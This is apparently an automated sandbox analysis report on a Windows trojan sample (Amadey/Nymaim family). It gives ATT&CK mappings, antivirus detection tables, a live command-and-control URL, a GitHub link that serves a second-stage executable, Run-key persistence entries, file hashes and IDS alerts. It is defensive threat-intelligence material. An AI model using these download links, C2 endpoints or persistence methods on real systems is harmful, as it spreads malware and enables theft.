                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6756, type: MEMORYSTR

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Windows Management Instrumentation | 121 Registry Run Keys / Startup Folder | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 22 Native API | Boot or Logon Initialization Scripts | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | 121 Registry Run Keys / Startup Folder | 4 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 3 Software Packing | NTDS | 45 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 251 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 211 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 2 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

Behavior Graph (image not reproduced): ID: 637914, Sample: 0XzeMRyE1e.exe, Startdate: 02/06/2022, Architecture: WINDOWS, Score: 100

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 0XzeMRyE1e.exe | 36% | Virustotal | |
| 0XzeMRyE1e.exe | 14% | Metadefender | |
| 0XzeMRyE1e.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Nymaim |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe | 20% | Metadefender | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe | 65% | ReversingLabs | Win32.Infostealer.Bandra |
| C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | 20% | Metadefender | |
| C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | 65% | ReversingLabs | Win32.Infostealer.Bandra |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | 14% | Metadefender | |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Nymaim |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 13.2.0XzeMRyE1e.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 13.0.0XzeMRyE1e.exe.400000.14.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 13.0.0XzeMRyE1e.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 21.0.0XzeMRyE1e.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 13.0.0XzeMRyE1e.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 17.0.file_22613.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 13.0.0XzeMRyE1e.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 18.2.file_22613.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 21.0.0XzeMRyE1e.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 21.0.0XzeMRyE1e.exe.400000.14.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 13.0.0XzeMRyE1e.exe.400000.16.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 20.0.file_22613.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 21.0.0XzeMRyE1e.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 18.0.file_22613.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 13.0.0XzeMRyE1e.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 17.2.file_22613.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 17.3.file_22613.exe.d5d0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 13.0.0XzeMRyE1e.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 21.0.0XzeMRyE1e.exe.400000.16.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 21.2.0XzeMRyE1e.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 21.0.0XzeMRyE1e.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1237910 |
| 20.2.file_22613.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 18.2.file_22613.exe.f840000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 17.2.file_22613.exe.14a3460.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 17.2.file_22613.exe.c60000.1.unpack | 100% | Avira | HEUR/AGEN.1224094 |
| 21.0.0XzeMRyE1e.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1237910 |

                        No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
| https://north.ac4 | 0% | Avira URL Cloud | safe |
| http://www.tiro.com | 0% | URL Reputation | safe |
| http://www.goodfont.co.kr | 0% | URL Reputation | safe |
| http://www.sajatypeworks.com | 0% | URL Reputation | safe |
| http://www.typography.netD | 0% | URL Reputation | safe |
| http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
| http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
| http://fontfabrik.com | 0% | URL Reputation | safe |
| http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
| http://www.sandoll.co.kr | 0% | URL Reputation | safe |
| http://94.130.174.62/n | 0% | Avira URL Cloud | safe |
| http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
| http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
| http://www.sakkal.com | 0% | URL Reputation | safe |
| http://sigint.ws/f8dfksdj3/index.php | 2% | Virustotal | |
| http://sigint.ws/f8dfksdj3/index.php | 100% | Avira URL Cloud | malware |
| http://94.130.174.62/g | 0% | Avira URL Cloud | safe |
| https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exe | 0% | Avira URL Cloud | safe |
| http://sigint.ws/f8dfksdj3/index.php2 | 100% | Avira URL Cloud | malware |
| http://www.microsoft. | 0% | URL Reputation | safe |
| http://sigint.ws/f8dfksdj3/index.phpD% | 100% | Avira URL Cloud | malware |
| http://www.carterandcone.coml | 0% | URL Reputation | safe |
| https://north.ac/760 | 0% | Avira URL Cloud | safe |
| http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
| https://mastodon.online/ | 0% | Avira URL Cloud | safe |
| http://north.ac/760 | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
| sigint.ws/f8dfksdj3/index.php | 100% | Avira URL Cloud | malware |
| http://94.130.174.62/1 | 0% | Avira URL Cloud | safe |
| http://94.130.174.62/ | 0% | Avira URL Cloud | safe |
| http://north.ac | 0% | Avira URL Cloud | safe |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| github.com | 140.82.121.3 | true | false | | high |
| sigint.ws | 80.66.64.103 | true | false | | high |
| raw.githubusercontent.com | 185.199.108.133 | true | false | | high |
| t.me | 149.154.167.99 | true | false | | high |
| mastodon.online | 95.216.4.252 | true | false | | high |
| north.ac | 172.67.152.230 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://github.com/neiqops/ajajaj/raw/main/file_22613.exe | false | | high |
| http://sigint.ws/f8dfksdj3/index.php | true | 2%, Virustotal; Avira URL Cloud: malware | unknown |
| https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exe | true | Avira URL Cloud: safe | unknown |
| http://github.com/neiqops/ajajaj/raw/main/file_22613.exe | false | | high |
| https://north.ac/760 | false | Avira URL Cloud: safe | unknown |
| http://north.ac/760 | false | Avira URL Cloud: safe | unknown |
| sigint.ws/f8dfksdj3/index.php | true | Avira URL Cloud: malware | low |
| https://t.me/hyipsdigest | false | | high |

                                                                              unknown
                                                                              http://north.ac0XzeMRyE1e.exe, 00000000.00000002.300951055.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430007815.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 172.67.152.230 | north.ac | United States | 13335 | CLOUDFLARENETUS | false |
| 94.130.174.62 | unknown | Germany | 24940 | HETZNER-ASDE | false |
| 185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false |
| 80.66.64.103 | sigint.ws | Russian Federation | 202723 | VAD-SRL-AS1MD | false |
| 140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false |
| 149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.2.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
                                                                              IP
                                                                              192.168.2.1
                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                              Analysis ID:637914
                                                                              Start date and time:2022-06-02 01:52:06 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 13m 57s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:0XzeMRyE1e.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:29
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.adwa.spyw.evad.winEXE@13/5@9/8
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 3.4% (good quality ratio 3.2%)
                                                                              • Quality average: 75.1%
                                                                              • Quality standard deviation: 29.6%
                                                                              HCA Information:
                                                                              • Successful, ratio: 92%
                                                                              • Number of executed functions: 118
                                                                              • Number of non-executed functions: 196
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.242.101.226, 20.223.24.244, 20.54.89.106
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
| --- | --- | --- |
| 01:53:29 | API Interceptor | 2124x Sleep call for process: 0XzeMRyE1e.exe modified |
| 01:53:39 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe |
| 01:53:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exe C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe |
| 01:54:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exe C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe |
                                                                              Process:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1488
                                                                              Entropy (8bit):5.338732761611821
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4o:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKz5
                                                                              MD5:1F4A1BE521D03C78DFC1140748736A44
                                                                              SHA1:FFEF96E58627E28B889AC3732AF9CE9523FC1D3F
                                                                              SHA-256:957C045BF1FFDD6BCCFDC09E4ED5C1BBE4A84F578D4183F3664D464EC207E960
                                                                              SHA-512:2A96AE11073B5A8DA06AB3B04ECB04725F3579FB5B1FFCC58EE875B414ADA246BACA8D9434C992AB42E3E21DCA19865AC370FBC7AEBC5EB8C0D24A445FCDCA2B
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                              Process:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1472680
                                                                              Entropy (8bit):7.646987510852842
                                                                              Encrypted:false
                                                                              SSDEEP:24576:L3Gz6a7Y5F9FalhN8UyHmqso17/cSvVXJwG/ECH3Jz2dRynhPJ3r:L3NaUF9FaDaU2hRVSvCXV23YJ7
                                                                              MD5:FE87E3591C90ECCD54C558FB487E262E
                                                                              SHA1:99A5F5220CFA72DF5D6D82F2E3193D26D63CE381
                                                                              SHA-256:0CDF56C68C183787FC86A47C092C5C75C7495BC632997EFFE9116820AFD6D9D1
                                                                              SHA-512:91389A61448C9031AFB3FF189092685617A56C9C1AB32E13160DBF59B728EC1FB9352ED5FBCBD1894C6D80D3A2FBDA48DC4DCCD5F87049EC3620D1DF60E0214D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 20%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Reputation:unknown
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):26112
                                                                              Entropy (8bit):4.928976046600336
                                                                              Encrypted:false
                                                                              SSDEEP:384:1JzYYYA2+plYBp5BxipUUXQvV/UHsxl94Rm4Hs4i1PgVhweVrNM2nTGbqHZAsqef:8+qtcHdD5PXlHnTx5m4
                                                                              MD5:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              SHA1:A11CF92600E88810AF392D2514795C165BCEA940
                                                                              SHA-256:7CB09DD4D3A661362B75EA236711AB5601F636EDB0D2C647FA8F18E190678B1D
                                                                              SHA-512:14699E0BC6B60AC35DDDFA9966966A9D9652BF2FB3E25CA30AC8BBBCFE72A567812D25B1E3C8609BBF3663CA45341EE0A888C5FCC762A8E5FBC014D134640268
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 14%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Reputation:unknown
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):4.928976046600336
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:0XzeMRyE1e.exe
                                                                              File size:26112
                                                                              MD5:4a2ac1e629644be2b37f29f21998c8d3
                                                                              SHA1:a11cf92600e88810af392d2514795c165bcea940
                                                                              SHA256:7cb09dd4d3a661362b75ea236711ab5601f636edb0d2c647fa8f18e190678b1d
                                                                              SHA512:14699e0bc6b60ac35dddfa9966966a9d9652bf2fb3e25ca30ac8bbbcfe72a567812d25b1e3c8609bbf3663ca45341ee0a888c5fcc762a8e5fbc014d134640268
                                                                              SSDEEP:384:1JzYYYA2+plYBp5BxipUUXQvV/UHsxl94Rm4Hs4i1PgVhweVrNM2nTGbqHZAsqef:8+qtcHdD5PXlHnTx5m4
                                                                              TLSH:C0C2E605B3B46723D5B847F116A39D2003BC7D2B68A1DB082DC974EF1966F04DA92B7B
                                                                              Icon Hash:71e874ba9a74e031
                                                                              Entrypoint:0x40643a
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x628FE36F [Thu May 26 20:30:39 2022 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:v4.0.30319
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x63e8           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x1b30        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x62b0           0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x4440        0x4600    False     0.389676339286   data       5.12816317374    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8000           0x1b30        0x1c00    False     0.291015625      data       4.02019644997    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name           RVA     Size    Type                  Language  Country
RT_ICON        0x8120  0x468   GLS_BINARY_LSB_FIRST
RT_ICON        0x8598  0x10a8  data
RT_GROUP_ICON  0x9650  0x22    data
RT_VERSION     0x9684  0x2ac   data
RT_MANIFEST    0x9940  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

DLL          Import
mscoree.dll  _CorExeMain

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2020
Assembly Version  1.0.0.0
InternalName      Zonli.exe
FileVersion       1.0.0.0
Comments
ProductName       Zonli
ProductVersion    1.0.0.0
FileDescription   Zonli
OriginalFilename  Zonli.exe

Timestamp  Protocol  SID  Message  Source Port  Dest Port  Source IP  Dest IP
                                                                              192.168.2.480.66.64.10349830802027700 06/02/22-01:54:30.708454TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349764802027700 06/02/22-01:53:40.683010TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349793802027700 06/02/22-01:54:02.814058TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349887802027700 06/02/22-01:55:00.209740TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.480.66.64.103
                                                                              80.66.64.103192.168.2.480497642838063 06/02/22-01:53:40.865782TCP2838063ETPRO TROJAN Amadey CnC Server Payload Response (exe)804976480.66.64.103192.168.2.4
                                                                              192.168.2.480.66.64.10349853802027700 06/02/22-01:54:46.902584TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349906802027700 06/02/22-01:55:08.703562TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349800802027700 06/02/22-01:54:09.502750TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349835802027700 06/02/22-01:54:33.554231TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349858802027700 06/02/22-01:54:49.360293TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349901802027700 06/02/22-01:55:06.719832TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349806802027700 06/02/22-01:54:12.991151TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349803802027700 06/02/22-01:54:11.166089TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349812802027700 06/02/22-01:54:16.364540TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349916802027700 06/02/22-01:55:12.621332TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349861802027700 06/02/22-01:54:50.675680TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349852802027700 06/02/22-01:54:46.408172TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349888802027700 06/02/22-01:55:00.609327TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349922802027700 06/02/22-01:55:14.194314TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349799802027700 06/02/22-01:54:08.864611TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349836802027700 06/02/22-01:54:34.112033TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349833802027700 06/02/22-01:54:32.459145TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349827802027700 06/02/22-01:54:28.893296TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349925802027700 06/02/22-01:55:14.580879TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349831802027700 06/02/22-01:54:31.147059TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349919802027700 06/02/22-01:55:13.807547TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349825802027700 06/02/22-01:54:27.778293TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349791802027700 06/02/22-01:54:01.965478TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.480.66.64.103
